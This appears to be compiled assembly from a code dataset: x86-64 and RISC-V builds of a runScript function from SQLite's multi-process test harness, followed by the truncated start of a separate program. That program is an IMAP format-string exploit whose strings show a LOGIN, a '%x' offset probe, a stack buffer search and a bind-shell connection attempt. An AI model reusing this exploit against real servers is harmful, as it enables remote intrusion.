-1176(%rbp), %rdi movq %rax, %r12 movq %rax, %rsi call evalSql@PLT movq %r12, %rdi call sqlite3_free@PLT movl -1120(%rbp), %eax addl %ebx, %eax movl %eax, -1148(%rbp) jmp .L11 .L137: movq -1208(%rbp), %rdi call atoi@PLT movl -1188(%rbp), %esi movl -1152(%rbp), %edi movl $1, %edx movl %eax, %r12d call finishScript@PLT testl %r12d, %r12d je .L139 .L25: movl %r12d, %edi call exit@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L26: movq -1216(%rbp), %rdi leaq .LC4(%rip), %rsi call strcmp@PLT movl -1152(%rbp), %edi testl %edi, %edi jle .L28 testq %rax, %rax je .L140 .L28: movq -1216(%rbp), %rdi leaq .LC5(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L128 movq -1216(%rbp), %rdi leaq .LC6(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L141 movq -1216(%rbp), %rdi leaq .LC8(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L41 movq -1216(%rbp), %rdi leaq .LC9(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L41 movq -1216(%rbp), %rdi leaq .LC11(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L45 movl -1092(%rbp), %esi leaq .LC12(%rip), %rdi call logMessage@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .p2align 4,,10 .p2align 3 .L139: movl 12+g(%rip), %edi call sqlite3_close@PLT jmp .L25 .L75: movl $0, -1144(%rbp) jmp .L13 .L138: movl -1120(%rbp), %eax movq %r14, %rdx leaq .LC0(%rip), %rdi leal -1(%rax), %esi xorl %eax, %eax call logMessage@PLT jmp .L128 .L140: movl -1188(%rbp), %esi movl $1, %edx call finishScript@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L141: movl -1120(%rbp), %eax leaq 7(%r14), %r13 movl $7, %ebx leal -1(%rax), %r12d cmpl $7, %r12d jg .L33 jmp .L32 .p2align 4,,10 .p2align 3 .L34: addl $1, %ebx addq $1, %r13 cmpl %ebx, %r12d je .L142 .L33: movsbl 0(%r13), %edi call ISSPACE@PLT testq %rax, %rax jne .L34 .L32: movl -1120(%rbp), %r12d movl -1092(%rbp), %r9d subl %ebx, %r12d subl $1, %r12d cmpl -1096(%rbp), %r12d je .L35 .L37: movq -1184(%rbp), %rdx movq %r13, %r8 movl %r12d, %ecx xorl %eax, %eax movl -1140(%rbp), %esi leaq .LC7(%rip), %rdi call errorMessage@PLT .L36: addl $1, 8+g(%rip) jmp .L128 .L41: cmpb $103, -1088(%rbp) sete %al sete %bl movzbl %al, %eax leal 0(,%rax,4), %edx subl %edx, %eax leal 9(%rax), %r12d movl -1120(%rbp), %eax leal -1(%rax), %r15d cmpl %r15d, %r12d jge .L39 movslq %r12d, %r13 addq %r14, %r13 jmp .L40 .L43: addl $1, %r12d addq $1, %r13 cmpl %r15d, %r12d je .L39 .L40: movsbl 0(%r13), %edi call ISSPACE@PLT testq %rax, %rax jne .L43 .L39: movl -1120(%rbp), %esi movslq %r12d, %rdx leaq .LC0(%rip), %rdi xorl %eax, %eax addq %r14, %rdx subl %r12d, %esi subl $1, %esi call sqlite3_mprintf@PLT movl -1092(%rbp), %esi movq %rax, %rdi movq %rax, %r12 call sqlite3_strglob@PLT testq %rax, %rax sete %al cmpb %al, %bl je .L44 movl -1092(%rbp), %r8d movq -1184(%rbp), %rdx movq %r12, %rcx xorl %eax, %eax movl -1140(%rbp), %esi leaq .LC10(%rip), %rdi call errorMessage@PLT .L44: movq %r12, %rdi call sqlite3_free@PLT jmp .L36 .L142: movslq %ebx, %r13 addq %r14, %r13 jmp .L32 .L35: movl %r12d, %edx movq %r13, %rsi movl %r9d, %edi call strncmp@PLT testq %rax, %rax je .L36 movl -1092(%rbp), %r9d jmp .L37 .L45: movq -1216(%rbp), %rdi leaq .LC13(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L46 movq -1208(%rbp), %rax xorl %r13d, %r13d movsbl (%rax), %edi movq %rax, %r12 call isDirSep@PLT testl %eax, %eax je .L143 .L47: movq %r12, %rdi call readFile@PLT cmpl $0, g(%rip) movq %rax, %r14 jne .L144 .L49: xorl %esi, %esi xorl %edi, %edi movq %r12, %rcx movq %r14, %rdx call runScript movq %r14, %rdi call sqlite3_free@PLT cmpl $0, g(%rip) jne .L145 .L50: movq %r13, %rdi call sqlite3_free@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L133: call __stack_chk_fail@PLT .L145: movq %r12, %rsi leaq .LC16(%rip), %rdi xorl %eax, %eax call logMessage@PLT jmp .L50 .L144: movq %r12, %rsi leaq .LC15(%rip), %rdi xorl %eax, %eax call logMessage@PLT jmp .L49 .L143: movq -1184(%rbp), %rdi call strlen@PLT leal -1(%rax), %ebx movslq %ebx, %rbx jmp .L48 .L147: movq -1184(%rbp), %rax movsbl (%rax,%rbx), %edi subq $1, %rbx call isDirSep@PLT testl %eax, %eax jne .L146 .L48: movl %ebx, %r13d testl %ebx, %ebx jns .L147 .L79: xorl %r13d, %r13d jmp .L47 .L46: movq -1216(%rbp), %rdi leaq .LC17(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L148 movq -1216(%rbp), %rdi leaq .LC18(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L149 movq -1216(%rbp), %rdi leaq .LC20(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L62 movslq -1120(%rbp), %rdi movq -1136(%rbp), %rdx xorl %esi, %esi movq %rdi, %rbx addq -1128(%rbp), %rdi addq -1112(%rbp), %rdi call findEndif@PLT addl -1116(%rbp), %eax addl %eax, %ebx jmp .L23 .L146: testl %r13d, %r13d jle .L79 movq -1208(%rbp), %rcx movq -1184(%rbp), %rdx movl %r13d, %esi xorl %eax, %eax leaq .LC14(%rip), %rdi call sqlite3_mprintf@PLT movq %rax, %r12 movq %rax, %r13 jmp .L47 .L62: movq -1216(%rbp), %rdi leaq .LC21(%rip), %rsi call strcmp@PLT movl -1116(%rbp), %ecx movl -1120(%rbp), %esi leal (%rcx,%rsi), %ebx testq %rax, %rax je .L23 movq -1216(%rbp), %rdi leaq .LC22(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L63 cmpl $0, -1152(%rbp) je .L150 movq -1216(%rbp), %rdi leaq .LC23(%rip), %rsi call strcmp@PLT .L66: movq -1216(%rbp), %rdi leaq .LC25(%rip), %rsi call strcmp@PLT .L67: movq -1216(%rbp), %rdi leaq .LC29(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L70 call test_breakpoint@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L149: movslq -1116(%rbp), %r13 movl $4, %ebx jmp .L59 .L56: movq -1112(%rbp), %rax addq %r13, %rax movsbl (%rax,%rbx), %edi addq $1, %rbx call ISSPACE@PLT testq %rax, %rax je .L60 .L59: movl %ebx, %r12d cmpl %ebx, -1120(%rbp) jg .L56 .L60: movl -1120(%rbp), %esi movslq %r12d, %rdx leaq .LC19(%rip), %rdi addq -1128(%rbp), %rdx addq -1112(%rbp), %rdx subl %r12d, %esi call prepareSql@PLT movq %rax, %rdi movq %rax, %r12 call sqlite3_step@PLT cmpl %eax, SQLITE_ROW(%rip) je .L151 .L57: movq -1136(%rbp), %rdx movslq -1120(%rbp), %rdi movl $1, %esi addq -1128(%rbp), %rdi addq -1112(%rbp), %rdi call findEndif@PLT addl %eax, -1116(%rbp) .L61: movq %r12, %rdi call sqlite3_finalize@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L148: movslq -1116(%rbp), %r13 movl $7, %ebx jmp .L53 .L52: movq -1112(%rbp), %rax addq %r13, %rax movsbl (%rax,%rbx), %edi addq $1, %rbx call ISSPACE@PLT testq %rax, %rax je .L54 .L53: movl %ebx, %r12d cmpl %ebx, -1120(%rbp) jg .L52 .L54: movl -1120(%rbp), %ebx movslq %r12d, %rdx leaq .LC0(%rip), %rdi xorl %eax, %eax addq -1128(%rbp), %rdx addq -1112(%rbp), %rdx movl %ebx, %esi subl %r12d, %esi call logMessage@PLT movl -1116(%rbp), %eax addl %eax, %ebx jmp .L23 .L150: movq -1208(%rbp), %rdi call atoi@PLT movl -1120(%rbp), %ecx movl %eax, %edi movl -1116(%rbp), %eax leal (%rax,%rcx), %ebx testl %edi, %edi jle .L23 call startClient@PLT jmp .L23 .L70: movq -1216(%rbp), %rdi leaq .LC30(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L71 movl -1116(%rbp), %eax movl -1120(%rbp), %ecx movl $1, 4+g(%rip) leal (%rax,%rcx), %ebx jmp .L23 .L71: movq -1216(%rbp), %rcx movq -1184(%rbp), %rdx leaq .LC31(%rip), %rdi xorl %eax, %eax movl -1140(%rbp), %esi call errorMessage@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L151: xorl %esi, %esi movq %r12, %rdi call sqlite3_column_int@PLT testq %rax, %rax je .L57 jmp .L61 .L63: movq -1216(%rbp), %rdi leaq .LC23(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L65 cmpl $0, -1152(%rbp) jne .L66 movl -1140(%rbp), %ecx movq -1184(%rbp), %r8 leaq -1056(%rbp), %r12 leaq .LC24(%rip), %rdx movq %r12, %rsi movl $1000, %edi call sqlite3_snprintf@PLT movq -1208(%rbp), %rdi call atoi@PLT movq %r12, %rdx movl $10000, %esi movl %eax, %edi call waitForClient@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L65: movq -1216(%rbp), %rdi leaq .LC25(%rip), %rsi call strcmp@PLT cmpl $0, -1152(%rbp) jne .L67 testq %rax, %rax jne .L67 movq -1208(%rbp), %rdi call atoi@PLT movq -1128(%rbp), %r12 movq -1136(%rbp), %rsi movl %eax, %r14d movslq -1120(%rbp), %rax addq %rax, %r12 movq -1112(%rbp), %rax leaq (%rax,%r12), %r13 movq %r13, %rdi call findEnd@PLT movl %eax, %ebx testl %r14d, %r14d js .L152 movq %r13, %rdx movl %eax, %esi leaq .LC0(%rip), %rdi xorl %eax, %eax call sqlite3_mprintf@PLT movq -1184(%rbp), %rdi movq %rax, %r15 call filenameTail@PLT movl -1140(%rbp), %edx leaq .LC27(%rip), %rdi movl %eax, %esi xorl %eax, %eax call sqlite3_mprintf@PLT movl %r14d, %edi movq %rax, %r13 call startClient@PLT movq %r13, %rcx movq %r15, %rdx movl %r14d, %esi leaq .LC28(%rip), %rdi xorl %eax, %eax call runSql@PLT movq %r15, %rdi call sqlite3_free@PLT movq %r13, %rdi call sqlite3_free@PLT .L69: movslq %ebx, %rdi movq -1136(%rbp), %rsi addq %r12, %rdi addq -1112(%rbp), %rdi call tokenLength@PLT addl %eax, %ebx addl %ebx, -1120(%rbp) movl -1120(%rbp), %eax addl -1116(%rbp), %eax movl %eax, -1148(%rbp) movl %eax, %ebx jmp .L23 .L152: movq -1184(%rbp), %rdx movl -1140(%rbp), %esi movl %r14d, %ecx xorl %eax, %eax leaq .LC26(%rip), %rdi call errorMessage@PLT jmp .L69 .cfi_endproc .LFE24: .size runScript, .-runScript .globl g .bss .align 16 .type g, @object .size g, 16 g: .zero 16 .globl SQLITE_ROW .align 4 .type SQLITE_ROW, @object .size SQLITE_ROW, 4 SQLITE_ROW: .zero 4 .globl MX_ARG .align 4 .type MX_ARG, @object .size MX_ARG, 4 MX_ARG: .zero 4 .globl g_aug_volatile_3861 .data .align 4 .type g_aug_volatile_3861, @object .size g_aug_volatile_3861, 4 g_aug_volatile_3861: .long 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_mptest.c_runScript_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "%.*s" .align 3 .LC1: .string "sleep" .align 3 .LC2: .string "exit" .align 3 .LC3: .string "testcase" .align 3 .LC4: .string "finish" .align 3 .LC5: .string "reset" .align 3 .LC6: .string "match" .align 3 .LC7: .string "line %d of %s:\nExpected [%.*s]\n Got [%s]" .align 3 .LC8: .string "glob" .align 3 .LC9: .string "notglob" .align 3 .LC10: .string "line %d of %s:\nExpected [%s]\n Got [%s]" .align 3 .LC11: .string "output" .align 3 .LC12: .string "%s" .align 3 .LC13: .string "source" .align 3 .LC14: .string "%.*s/%s" .align 3 .LC15: .string "begin script [%s]\n" .align 3 .LC16: .string "end script [%s]\n" .align 3 .LC17: .string "print" .align 3 .LC18: .string "if" .align 3 .LC19: .string "SELECT %.*s" .align 3 .LC20: .string "else" .align 3 .LC21: .string "endif" .align 3 .LC22: .string "start" .align 3 .LC23: .string "wait" .align 3 .LC24: .string "line %d of %s\n" .align 3 .LC25: .string "task" .align 3 .LC26: .string "line %d of %s: bad client number: %d" .align 3 .LC27: .string "%s:%d" .align 3 .LC28: .string "INSERT INTO task(client,script,name) VALUES(%d,'%q',%Q)" .align 3 .LC29: .string "breakpoint" .align 3 .LC30: .string "show-sql-errors" .align 3 .LC31: .string "line %d of %s: unknown command --%s" .text .align 1 .type runScript, @function runScript: addi sp,sp,-1264 sd ra,1256(sp) sd s0,1248(sp) sd s2,1232(sp) addi s0,sp,1264 sd s3,1224(sp) sd s10,1168(sp) sd s1,1240(sp) sd s4,1216(sp) sd s5,1208(sp) sd s6,1200(sp) sd s7,1192(sp) sd s8,1184(sp) sd s9,1176(sp) sd s11,1160(sp) lla a5,.LANCHOR0 lw a5,0(a5) li a4,100 addi s10,s0,-1160 mul a5,a5,a4 mv a4,a1 sd a4,-1240(s0) la a4,__stack_chk_guard mv a6,a0 mv s2,a2 li a1,0 li a2,8 mv a0,s10 sd a6,-1232(s0) addi a5,a5,15 andi a5,a5,-16 sub sp,sp,a5 ld a5, 0(a4) sd a5, -120(s0) li a5, 0 li a5,1 sd a3,-1224(s0) sw a5,-1164(s0) call memset@plt mv a0,s10 call stringReset@plt lbu s3,0(s2) sd sp,-1216(s0) beq s3,zero,.L3 addi a5,s0,-1152 sd a5,-1208(s0) addi a5,s0,-1120 sd a5,-1248(s0) li a5,8192 addi a5,a5,1808 sext.w s6,s3 mv s5,s2 sd zero,-1192(s0) li s1,0 li s7,0 addi s8,s0,-1164 sd a5,-1256(s0) .L2: lw a5,-1164(s0) mv a1,s8 mv a0,s5 sd a5,-1176(s0) call tokenLength@plt mv s4,a0 mv a0,s3 call ISSPACE@plt bne a0,zero,.L20 li a5,47 beq s6,a5,.L20 li a4,45 bne s6,a4,.L20 add a5,s2,s7 lbu a5,1(a5) beq a5,a4,.L111 .L20: addw s1,s1,s4 add s5,s2,s1 lbu s3,0(s5) mv s7,s1 sext.w s6,s3 bne s3,zero,.L2 ld a5,-1192(s0) bgt s1,a5,.L112 .L3: mv a0,s10 call stringFree@plt la a5,__stack_chk_guard ld a4, -120(s0) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L113 addi sp,s0,-1264 ld ra,1256(sp) ld s0,1248(sp) ld s1,1240(sp) ld s2,1232(sp) ld s3,1224(sp) ld s4,1216(sp) ld s5,1208(sp) ld s6,1200(sp) ld s7,1192(sp) ld s8,1184(sp) ld s9,1176(sp) ld s10,1168(sp) ld s11,1160(sp) addi sp,sp,1264 jr ra .L112: subw a1,s1,a5 add a2,s2,a5 lla a0,.LC0 call sqlite3_mprintf@plt mv s1,a0 call runSql@plt mv a0,s1 call sqlite3_free@plt j .L3 .L111: addi a5,s7,2 add s6,s2,a5 lbu a0,0(s6) sd a5,-1200(s0) call isalpha@plt beq a0,zero,.L20 ld a5,-1192(s0) blt a5,s1,.L114 .L8: lla a5,.LANCHOR0 lw a5,8(a5) li a4,1 ble a5,a4,.L9 mv a2,s5 mv a1,s4 lla a0,.LC0 call logMessage@plt .L9: ld a2,-1208(s0) addiw s3,s4,-2 li a3,30 mv a1,s3 mv a0,s6 call extractToken@plt mv a5,a0 ble s3,a0,.L72 ld a4,-1216(s0) li s6,0 sd a4,-1184(s0) .L11: lla a4,.LANCHOR0 lw a4,0(a4) ble a4,s6,.L17 mv s9,a5 sext.w s11,a5 .L18: add a4,s1,s9 add a4,s2,a4 lbu a0,2(a4) call ISSPACE@plt beq a0,zero,.L115 addi s9,s9,1 sext.w s11,s9 bgt s3,s11,.L18 .L10: lla a5,.LANCHOR0 lw a4,0(a5) bge s6,a4,.L17 li a5,100 mul a5,s6,a5 ld a3,-1216(s0) add a5,a3,a5 .L19: sb zero,0(a5) addiw s6,s6,2 addi a5,a5,200 bgt a4,s6,.L19 .L17: ld a0,-1208(s0) lla a1,.LC1 call strcmp@plt bne a0,zero,.L116 ld a0,-1216(s0) call atoi@plt call sqlite3_sleep@plt j .L20 .L115: ble s3,s11,.L10 ld a5,-1200(s0) ld s9,-1184(s0) li a3,100 add a0,s11,a5 mv a2,s9 subw a1,s3,s11 add a0,s2,a0 call extractToken@plt addi a4,s9,-100 addw a5,a0,s11 sd a4,-1184(s0) addiw s6,s6,-1 bgt s3,a5,.L11 j .L10 .L116: ld a0,-1208(s0) lla a1,.LC2 call strcmp@plt beq a0,zero,.L117 ld a0,-1208(s0) lla a1,.LC3 call strcmp@plt bne a0,zero,.L23 lla a5,.LANCHOR0 lw a5,8(a5) li a4,1 beq a5,a4,.L118 .L108: mv a0,s10 call stringReset@plt j .L20 .L114: subw a1,s1,a5 add a2,s2,a5 lla a0,.LC0 call sqlite3_mprintf@plt mv a1,a0 mv s3,a0 mv a0,s10 call evalSql@plt mv a0,s3 call sqlite3_free@plt addw a5,s4,s1 sd a5,-1192(s0) j .L8 .L117: ld a0,-1216(s0) call atoi@plt mv s3,a0 ld a1,-1240(s0) ld a0,-1232(s0) li a2,1 call finishScript@plt beq s3,zero,.L119 .L22: mv a0,s3 call exit@plt j .L20 .L23: ld a0,-1208(s0) lla a1,.LC4 call strcmp@plt bne a0,zero,.L25 ld a0,-1232(s0) bgt a0,zero,.L120 .L25: ld a0,-1208(s0) lla a1,.LC5 call strcmp@plt beq a0,zero,.L108 ld a0,-1208(s0) lla a1,.LC6 call strcmp@plt beq a0,zero,.L121 ld a0,-1208(s0) lla a1,.LC8 call strcmp@plt beq a0,zero,.L38 ld a0,-1208(s0) lla a1,.LC9 call strcmp@plt beq a0,zero,.L38 ld a0,-1208(s0) lla a1,.LC11 call strcmp@plt bne a0,zero,.L42 lw a1,-1156(s0) lla a0,.LC12 call logMessage@plt j .L20 .L119: lla a5,.LANCHOR0 lw a0,20(a5) call sqlite3_close@plt j .L22 .L72: li s6,0 j .L10 .L118: mv a2,s5 addiw a1,s4,-1 lla a0,.LC0 call logMessage@plt j .L108 .L120: ld a1,-1240(s0) li a2,1 call finishScript@plt j .L20 .L121: addiw s7,s4,-1 li s3,7 addi s6,s5,7 bgt s7,s3,.L30 j .L29 .L31: addiw s3,s3,1 addi s6,s6,1 beq s7,s3,.L122 .L30: lbu a0,0(s6) call ISSPACE@plt bne a0,zero,.L31 .L29: lw a4,-1160(s0) subw s3,s4,s3 addiw s3,s3,-1 lw a5,-1156(s0) beq a4,s3,.L32 .L34: ld a2,-1224(s0) ld a1,-1176(s0) mv a4,s6 mv a3,s3 lla a0,.LC7 call errorMessage@plt .L109: lla a4,.LANCHOR0 lw a5,16(a4) mv a0,s10 addiw a5,a5,1 sw a5,16(a4) call stringReset@plt j .L20 .L38: lbu s6,-1152(s0) addiw s9,s4,-1 addi s6,s6,-103 seqz s6,s6 slliw s3,s6,2 subw s3,s6,s3 addiw s3,s3,9 ble s9,s3,.L36 add s7,s5,s3 j .L37 .L40: addiw s3,s3,1 addi s7,s7,1 beq s9,s3,.L36 .L37: lbu a0,0(s7) call ISSPACE@plt bne a0,zero,.L40 .L36: subw a1,s4,s3 add a2,s5,s3 addiw a1,a1,-1 lla a0,.LC0 call sqlite3_mprintf@plt lw a1,-1156(s0) mv s3,a0 call sqlite3_strglob@plt seqz a5,a0 beq a5,s6,.L41 lw a4,-1156(s0) ld a2,-1224(s0) ld a1,-1176(s0) mv a3,s3 lla a0,.LC10 call errorMessage@plt .L41: mv a0,s3 call sqlite3_free@plt j .L109 .L122: add s6,s5,s3 j .L29 .L32: mv a2,s3 mv a1,s6 mv a0,a5 call strncmp@plt beq a0,zero,.L109 lw a5,-1156(s0) j .L34 .L42: ld a0,-1208(s0) lla a1,.LC13 call strcmp@plt bne a0,zero,.L43 ld a5,-1216(s0) li s5,0 lbu a0,0(a5) mv s3,a5 call isDirSep@plt beq a0,zero,.L123 .L44: mv a0,s3 call readFile@plt lla a5,.LANCHOR0 lw a5,8(a5) mv s6,a0 bne a5,zero,.L124 .L46: mv a3,s3 mv a2,s6 li a1,0 li a0,0 call runScript mv a0,s6 call sqlite3_free@plt lla a5,.LANCHOR0 lw a5,8(a5) bne a5,zero,.L125 .L47: mv a0,s5 call sqlite3_free@plt j .L20 .L113: call __stack_chk_fail@plt .L125: mv a1,s3 lla a0,.LC16 call logMessage@plt j .L47 .L124: mv a1,s3 lla a0,.LC15 call logMessage@plt j .L46 .L123: ld a0,-1224(s0) call strlen@plt addiw s5,a0,-1 j .L45 .L127: ld a5,-1224(s0) add a5,a5,s5 lbu a0,0(a5) addi s5,s5,-1 call isDirSep@plt bne a0,zero,.L126 .L45: sext.w s6,s5 bge s6,zero,.L127 .L75: li s5,0 j .L44 .L43: ld a0,-1208(s0) lla a1,.LC17 call strcmp@plt beq a0,zero,.L128 ld a0,-1208(s0) lla a1,.LC18 call strcmp@plt beq a0,zero,.L129 ld a0,-1208(s0) lla a1,.LC20 call strcmp@plt bne a0,zero,.L59 add a0,s4,s7 mv a2,s8 li a1,0 add a0,s2,a0 call findEndif@plt addw s1,a0,s1 j .L20 .L126: ble s6,zero,.L75 ld a3,-1216(s0) ld a2,-1224(s0) mv a1,s6 lla a0,.LC14 call sqlite3_mprintf@plt mv s3,a0 mv s5,a0 j .L44 .L59: ld a0,-1208(s0) lla a1,.LC21 call strcmp@plt beq a0,zero,.L20 ld a0,-1208(s0) lla a1,.LC22 call strcmp@plt bne a0,zero,.L60 ld a5,-1232(s0) beq a5,zero,.L130 ld a0,-1208(s0) lla a1,.LC23 call strcmp@plt .L63: ld a0,-1208(s0) lla a1,.LC25 call strcmp@plt .L64: ld a0,-1208(s0) lla a1,.LC29 call strcmp@plt bne a0,zero,.L67 call test_breakpoint@plt j .L20 .L129: li s3,4 j .L56 .L53: add a5,s1,s3 add a5,s2,a5 lbu a0,0(a5) addi s3,s3,1 call ISSPACE@plt beq a0,zero,.L57 .L56: sext.w s5,s3 bgt s4,s5,.L53 .L57: add a2,s5,s7 add a2,s2,a2 subw a1,s4,s5 lla a0,.LC19 call prepareSql@plt mv s3,a0 call sqlite3_step@plt lla a5,.LANCHOR0 lw a5,24(a5) beq a5,a0,.L131 .L54: add a0,s4,s7 mv a2,s8 li a1,1 add a0,s2,a0 call findEndif@plt addw s1,a0,s1 .L58: mv a0,s3 call sqlite3_finalize@plt j .L20 .L128: li s3,7 j .L50 .L49: add a5,s1,s3 add a5,s2,a5 lbu a0,0(a5) addi s3,s3,1 call ISSPACE@plt beq a0,zero,.L51 .L50: sext.w s5,s3 bgt s4,s5,.L49 .L51: add a2,s5,s7 add a2,s2,a2 subw a1,s4,s5 lla a0,.LC0 call logMessage@plt j .L20 .L130: ld a0,-1216(s0) call atoi@plt ble a0,zero,.L20 call startClient@plt j .L20 .L67: ld a0,-1208(s0) lla a1,.LC30 call strcmp@plt bne a0,zero,.L68 lla a5,.LANCHOR0 li a4,1 sw a4,12(a5) j .L20 .L68: ld a3,-1208(s0) ld a2,-1224(s0) ld a1,-1176(s0) lla a0,.LC31 call errorMessage@plt j .L20 .L131: li a1,0 mv a0,s3 call sqlite3_column_int@plt beq a0,zero,.L54 j .L58 .L60: ld a0,-1208(s0) lla a1,.LC23 call strcmp@plt bne a0,zero,.L62 ld a5,-1232(s0) bne a5,zero,.L63 ld s3,-1248(s0) ld a4,-1224(s0) ld a3,-1176(s0) mv a1,s3 lla a2,.LC24 li a0,1000 call sqlite3_snprintf@plt ld a0,-1216(s0) call atoi@plt ld a1,-1256(s0) mv a2,s3 call waitForClient@plt j .L20 .L62: ld a0,-1208(s0) lla a1,.LC25 call strcmp@plt bne a0,zero,.L64 ld a5,-1232(s0) bne a5,zero,.L64 ld a0,-1216(s0) add s7,s4,s7 add s6,s2,s7 call atoi@plt mv s5,a0 mv a1,s8 mv a0,s6 call findEnd@plt mv s3,a0 blt s5,zero,.L132 mv a2,s6 mv a1,a0 lla a0,.LC0 call sqlite3_mprintf@plt mv s9,a0 ld a0,-1224(s0) call filenameTail@plt ld a2,-1176(s0) mv a1,a0 lla a0,.LC27 call sqlite3_mprintf@plt mv s6,a0 mv a0,s5 call startClient@plt mv a3,s6 mv a2,s9 mv a1,s5 lla a0,.LC28 call runSql@plt mv a0,s9 call sqlite3_free@plt mv a0,s6 call sqlite3_free@plt .L66: add s7,s3,s7 mv a1,s8 add a0,s2,s7 call tokenLength@plt addw a5,s3,a0 addw s4,a5,s4 addw a5,s4,s1 sd a5,-1192(s0) j .L20 .L132: ld a2,-1224(s0) ld a1,-1176(s0) mv a3,s5 lla a0,.LC26 call errorMessage@plt j .L66 .size runScript, .-runScript .globl g .globl SQLITE_ROW .globl MX_ARG .globl g_aug_volatile_3861 .data .align 2 .type g_aug_volatile_3861, @object .size g_aug_volatile_3861, 4 g_aug_volatile_3861: .word 8 .bss .align 3 .set .LANCHOR0,. + 0 .type MX_ARG, @object .size MX_ARG, 4 MX_ARG: .zero 4 .zero 4 .type g, @object .size g, 16 g: .zero 16 .type SQLITE_ROW, @object .size SQLITE_ROW, 4 SQLITE_ROW: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_1234.c_main_aug_v3_1
.file "extr_1234.c_main_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "localhost" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "exp.c:115 Could not allocate memory\n" .section .rodata.str1.1 .LC2: .string "h:p:l:a:" .section .rodata.str1.8 .align 8 .LC3: .string "exp.c:139 Error creating an new socket" .align 8 .LC4: .string "exp.c:152 Could not resolve ip address\n" .section .rodata.str1.1 .LC5: .string "[+] Connecting to %s:%d\n" .section .rodata.str1.8 .align 8 .LC6: .string "[*] exp.c:178 Connection failed\n" .section .rodata.str1.1 .LC7: .string "[+] Connected .. \n" .LC8: .string "[+] Sending login ... \n" .LC9: .string "1 LOGIN %s %s\r\n" .LC10: .string "[+] Done ... \n" .LC11: .string "[+] Selecting inbox ..\n" .LC12: .string "2 Select inbox\n" .section .rodata.str1.8 .align 8 .LC13: .string "[+] Selecting Done .. Starting brute sequence\n" .align 8 .LC14: .string "3 search topic .AAAABBBB%%%d$x\n" .section .rodata.str1.1 .LC15: .string "(near" .LC16: .string "41414141" .LC17: .string "[+] Found offset %d\n" .section .rodata.str1.8 .align 8 .LC18: .string "[+] Finding buffer on the stack\n" .section .rodata.str1.1 .LC19: .string "[+] Decoy found at %p\n" .section .rodata.str1.8 .align 8 .LC20: .string "[+] Trying to contact the bind shell ..\n" .section .rodata.str1.1 .LC21: .string "[-] Exploit failed\n" .LC22: .string "[+] Closing connection\n" .LC23: .string "[-] Exploit failed %p\n" .section .rodata.str1.8 .align 8 .LC24: .string "3 search topic .%s....%%%d$s%sCCCC\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movq %rsi, %rbp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movl %edi, %ebx subq $600, %rsp .cfi_def_cfa_offset 656 movq %fs:40, %rax movq %rax, 584(%rsp) movl g_aug_volatile_4452(%rip), %eax movl $134660096, 44(%rsp) subl $1, %eax movl %eax, g_aug_volatile_4452(%rip) xorl %eax, %eax call welcome@PLT cmpl $8, %ebx jle .L71 .L2: movl $128, %edi call malloc@PLT movq %rax, 8(%rsp) testq %rax, %rax je .L72 .L3: xorl %r13d, %r13d leaq .LC2(%rip), %r14 leaq .L7(%rip), %r12 .p2align 4,,10 .p2align 3 .L4: movq %r14, %rdx movq %rbp, %rsi movl %ebx, %edi call getopt@PLT cmpl %eax, EOF(%rip) je .L73 subl $86, %eax cmpl $26, %eax ja .L5 movslq (%r12,%rax,4), %rax addq %r12, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L7: .long .L4-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L10-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L5-.L7 .long .L9-.L7 .long .L5-.L7 .long .L5-.L7 .long 